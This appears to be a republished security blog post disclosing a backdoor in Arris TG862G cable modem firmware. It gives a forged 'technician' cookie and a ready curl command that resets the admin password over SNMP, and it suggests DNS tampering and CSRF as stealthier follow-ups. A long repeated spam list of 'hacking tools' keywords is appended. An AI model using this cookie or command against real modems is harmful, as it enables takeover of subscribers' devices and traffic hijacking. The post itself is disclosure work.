Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


More info

1. Pentest Tools Nmap
2. Hack Tools For Pc
3. Game Hacking
4. Pentest Tools Free
5. Hacker Tools For Mac
6. Hacking Tools Mac
7. Hacker Tools 2020
8. Pentest Tools
9. Nsa Hacker Tools
10. Growth Hacker Tools
11. Hacking Tools Software
12. Pentest Tools Open Source
13. Hack Tools 2019
14. Tools For Hacker
15. New Hacker Tools
16. Hack Tools Github
17. Hack Tools For Ubuntu
18. Hacking Tools
19. Hacker Hardware Tools
20. Best Hacking Tools 2020
21. Hack Rom Tools
22. Hacker Tools Free Download
23. Hacking Tools For Windows 7
24. Pentest Tools Framework
25. What Are Hacking Tools
26. Hacking Tools Pc
27. Hacker Tools 2019
28. Hack Apps
29. Pentest Tools List
30. Hacker Tools Mac
31. Hacking Tools And Software
32. Hacker Tools For Windows
33. Hacking Tools For Pc
34. Hak5 Tools
35. Best Hacking Tools 2020
36. Pentest Tools Online
37. Pentest Automation Tools
38. Pentest Box Tools Download
39. Ethical Hacker Tools
40. Pentest Tools Online
41. Hacker Tools Software
42. Pentest Tools Windows
43. Hacker Tools Free Download
44. Hacking Tools Pc
45. Pentest Tools Linux
46. Best Hacking Tools 2020
47. Pentest Tools For Ubuntu
48. Hack Tools Online
49. Underground Hacker Sites
50. Hacker Hardware Tools
51. Pentest Tools Find Subdomains
52. Wifi Hacker Tools For Windows
53. Pentest Automation Tools
54. Pentest Box Tools Download
55. Pentest Tools Linux
56. What Are Hacking Tools
57. Pentest Tools Github
58. Pentest Tools For Android
59. Pentest Tools Subdomain
60. Pentest Reporting Tools
61. Hacking Tools For Pc
62. Hacker
63. Pentest Tools For Android
64. Hack Tools Online
65. Hacker Techniques Tools And Incident Handling
66. Hacker Tools Github
67. Pentest Tools For Mac
68. Pentest Tools Nmap
69. Wifi Hacker Tools For Windows
70. Hacking Tools For Mac
71. Hack Tool Apk No Root
72. Hacking Tools And Software
73. Tools Used For Hacking
74. Hacker Tool Kit
75. Hacks And Tools
76. Pentest Reporting Tools
77. Hacking Apps
78. Hacker Tools For Ios
79. Hacker Tools Online
80. Hack Tools
81. Pentest Automation Tools
82. Pentest Tools For Mac
83. Pentest Tools Free
84. Pentest Tools Website
85. Hack Tools Github
86. Best Hacking Tools 2019
87. Hack Tools
88. Black Hat Hacker Tools
89. Hack Tools For Games
90. Hacking Tools Windows 10
91. Hacking Tools Usb
92. Pentest Box Tools Download
93. Blackhat Hacker Tools
94. Hack Tools For Windows
95. New Hacker Tools
96. Physical Pentest Tools
97. What Is Hacking Tools
98. Pentest Tools Free
99. Android Hack Tools Github
100. Pentest Tools Online
101. Hacking Tools And Software
102. Hack And Tools
103. Hacking Tools For Windows 7
104. Hack Tools 2019
105. Computer Hacker
106. Hacking Tools Windows 10
107. Hacker
108. Top Pentest Tools
109. Pentest Tools Website Vulnerability
110. Tools For Hacker
111. Hacking Tools For Mac
112. Hacking Tools For Kali Linux
113. Pentest Tools Apk
114. Pentest Tools Free
115. Hack Tools Github
116. Ethical Hacker Tools
117. Pentest Tools Online
118. Hacking Tools Hardware
119. Hacking Tools For Beginners
120. Hacking Tools For Kali Linux
121. Hacking Tools 2019
122. Free Pentest Tools For Windows
123. Pentest Tools For Android
124. Hacking Tools Usb
125. Tools For Hacker
126. Pentest Tools Download
127. Hack Tools 2019
128. Hack Website Online Tool
129. Hacking Tools Pc
130. Hacking Tools Hardware
131. Hacks And Tools
132. Hacks And Tools
133. World No 1 Hacker Software
134. Hacking Tools For Windows 7
135. Hacker Tools List
136. Hacker Tools Software